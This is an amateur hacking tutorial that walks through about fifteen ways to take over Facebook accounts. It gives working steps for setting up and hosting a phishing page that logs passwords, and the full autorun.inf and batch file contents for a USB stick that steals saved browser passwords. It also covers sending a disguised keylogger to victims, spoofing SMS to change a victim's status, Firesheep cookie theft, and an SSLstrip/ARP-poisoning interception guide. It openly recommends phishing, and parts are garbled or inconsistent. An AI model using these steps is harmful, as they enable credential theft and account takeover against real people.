We have discussed alot about popular password cracking methods such as Bruteforce, Dictionary attack and Rainbow tables. However a question I get asked frequently is if it's possible to crack a Facebook account. So I wish to clear concepts related to Hacking/Cracking Facebook accounts. First of all "Hacking a Facebook account" and "Cracking a facebook account" are both different terminologies.
Hacking a facebook account refers to foolproof methods such as Phishing, keylogging, Social engineering etc.
However the terminology cracking refers to the methods such as Bruteforce, Dictionary attacks etc.
1) Brute Force Attacks - what is Brute Force Attacks ?
Bruteforce is one of the most common and most reliable password cracking methodologies. A bruteforce attack tries all possible combinations against the medium, until the correct password is found. However the problem with a bruteforce attack is that as the password complexity increases, the time taken to crack a password also increases.
2) Dictionary Attacks -what is Dictionary Attacks?
The only difference with a bruteforce attack and Dictionary attack is that "A Dictionary attack tries the passwords which we want it to try". Confusing?. In a dictionary attack we have the freedom to choose a huge list of words that people commonly use in their password (Depending upon the situation). The following video will help you understand more about Dictionary attacks.
http://www.youtube.com/watch?v=9B4e0p6zbwk&feature=player_embedded ( Dictionary Attacks tutorial )
3) Cracking Facebook Accounts - what is Cracking Facebook Accounts ?
Coming back to the main topic of this article. A few hours back while I was watching hacking related videos on securitytube.net, I came across to a video in which the hacker claimed that one can use "Hydra To Crack A Facebook Password". However here is why a bruteforce attack won't work against a facebeook account.
Facebook and all other popular social networking websites lock an email account, after few unsuccessful login attempts. They either have introduced an "Account Lockout Feature" or they either have introduced an "Account Lockout" feature, which prevents an automated password cracking method to work. However, even if you get it working, A minimum facebook password length is about 6-characters. kindly refer to the chart and find out your success rate.
http://www.youtube.com/watch?feature=player_embedded&v=w8TeD-GO8tc ( Cracking Facebook Accounts tutorial )
4) Hack A Facebook Account By Exploiting Facebook's Trusted Friend Feature ?
Facebook is constantly trying to improve their website's security by introducing new security features that would help facebook users to stay safe and secure. We recently published a report that around "83 Million Facebook Accounts Are Fake", therefore facebook is having a tough time improving their services and making it spam free and more secure. One of those important security features that facebook introduced in late 2011 named "Trusted Friends Feature".
This feature enabled a facebook user to recover his/her facebook account by choosing 3 trusted friends who will be provided a key (code) by facebook and the facebook user would need to call the trusted friends and ask for the codes, Once the facebok user has entered all three of the keys, he would regain access to his/her facebook account.
xploiting Facebook's Trusted Friends Feature To Hack A Facebook Account:
However this feature can be easily exploited to hack a facebook account, A hacker can easily create 3 fake facebook profiles and add it to victims account, Thus making it simple for a hacker to hack into a facebook account.
http://www.youtube.com/watch?feature=player_embedded&v=VxbEgZl-f6s ( Hack Facebook Password By Trusted Friends tutorial )
5) Keylogging - what is Keylogging ?
This tool is extremely easy to connect and use. All you have to do is give an email address and a password where the stolen information is to deliver. Can’t be easier than that.
Just type in the email address and password and then click on the build button. A new “SERVER.EXE” file will be created and most of the work is already done. Now the big part comes. Just send this file to the victim. Rename it, change the icon and make it more presentable so that the victim opens it for sure.
As soon as the victim opens the file, Server.exe will get all the passwords saved and facebook account credentials and will give them to you. To avoid detection, the facebook Hacker will also look for all the processes related to a security suite and kill them upon detection. The most important thing this software does is it kills all the security suite detecting it.
You should know how to protect yourself from such threats. BitDefender detects this as a Trojan. In order to stay safe ensure that you update your antivirus regularly. Also, remember not to run files you may receive as attachments or via IM, or at least, to scan them beforehand.
6) Hijacking Facebook Fan Pages ?
Recently I have been receiving lots of complains from RHA readers that their facebook fan pages are getting hacked. There is no rocket science or Zero day being used to hack facebook fan pages. However it's a simple facebook bug which helps the admins to remove another admin. However facebook should set up a rule that the original admins should not be removed. The following video by Sophos explains how easy it is to hijack facebook fan pages.
(This Notes Copyright By Anonymous (Chris Defaulter Vlentine).
However it's quite strange to see according to facebook help page, Primary or original admin cannot be removed. However it's untrue. Which evolves the whole idea of Hijacking facebook fan pages.
http://www.youtube.com/watch?feature=player_embedded&v=4LSKEoXJUDY ( Hijacking Facebook fan pages tutorial ).
7) Hack Facebook Account Status - Facebook Status Vulnerability ?
Facebook Account Status Hack - Methodology
There are tons of Facebook users who use a feature called facebook text in order to update a facebook status. If you have enabled this feature all you need to do in order to update your status is to type in your status and send it to "923223265".
However the idea behind this facebook Account status hack is to send a fake sms from your friend's number, therefore the facebook will think that the message has came from the legitimate source and hence it will update the victims Status.
SMS Global
SMSGlobal is a website that allows you send fake sms, The free account only allows you to send 25 SMS, However the business account allows you to send more. All you need to do is to register on SMS global, activate your account. After logging in to your account, click on “Send SMS to a Number”.
Send SMS To: 923223265 (Facebook)
Sender ID From: Victims Mobile Number.
Message: The Status which you would like to be updated.
CounterMeasures
Turn off facebook mobile updating feature.
8) Facebook phishing - what is facebook Facebook phishing ?
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.
1.once you have downloded facebook fake login page now extract contents in a folder
2.Now open pass.php and find (CTRL+F) 'http://chrisdefaulter.anonymous.com' then change it to your to is the 'http://www.google.com.pk'
Note:'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com' instead of "http://rafayhackingarticles.blogspot.com"
Now Save it .
3.Now open facebook fake page in a wordpad
4.Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com,www.ripway.com or t35.com.
Note:Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can use ooowebhost.
6.Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored
7.Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !
How it works?
When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it .So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his Facebook.com password hacked
9) Stealers - what is Stealers ?
Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful. If you want to how stealers work and how you can set up your own one
10) Session Hijacking - what is Session Hijacking ?
Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.
11) Sidejacking With Firesheep - what is Sidejacking With Firesheep ?
Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.
Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account.
In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.
How can a Hacker use Firesheep to Hack a Facebook or any other account?
Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:
Public wifi access
winpcap
Firesheep
1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser
2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep
3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly
12) Mobile Phone Hacking- what is Mobile Phone Hacking ?
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.
The most popular Mobile Phone Spying softwares are:
1. Mobile Spy
2. Spy Phone Gold
13) DNS Spoofing - what is DNS Spoofing ?
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.
http://www.youtube.com/watch?v=LU2tS2ip1f8&feature=player_embedded ( DNS Spoofing tutorial )
13) USB Hacking -what is USB Hacking ?
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser.
As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords,so in this note i will explain you on How to made a USB passwords stealer and steal saved passwords.
Things you will need?
1) MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.
2) Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
3) IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.
4) Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
5) Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
Note:Kindly disable your antivirus before performing these steps
1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.
After this you can see saved password in .TXT files
14) Man In the Middle Attacks - what is Man In the Middle Attacks?
If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks.
ne of the most successful way of gaining information such as passwords,user ids etc in LAN (local area network) is through man in the middle attacks . I will not be going to deep into Man in the middle attacks, but in simple words it can be explained as attacker or a hacker listening to all the information sent in between the client and the server .To prevent these kind of attacks Email providers started using Hypertext Transfer Protocol Secure (HTTPS) It is a combination of the Hypertext Transfer Protocol(HTTP) with SSL (Secure socket layer )protocol to provide encrypted communication between the client and the server .So when a hacker caries out a Mimt attack the victim is cautioned with a invalid SSL Certificate
In this tutorial I will teach how to carry out a successful Mitm attack
Concept :-
We Know that HTTP (Hypertext Transfer Protocol )simply sends all the information through plain text .So if we make the victim use HTTP instead of HTTPS to connect sites like Gmail , Pay pal. we will be able to carry out a successful Mitm attack with out causing any suspicion To do this we are going to use a tool called SSL strip
What is SSL(Secure Socket Layer)
Thing we Need
1. SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial
2. Ettercap to carry out mitm attacks
Demonstration :-
1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok
2. Now select the victim’s IP and click open
3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok
4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2
5. Now select mitm-arp poisoning and click ok as shown
6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTP and not HTTPS Hence we are able to get the User id ,passwords.
Counter measures:
1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS
2. Always check the SSL certificate before doing an online transaction
15) Botnets - what is Botnets ? ( only anonymous member know how to work botnet )
Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.
Read More
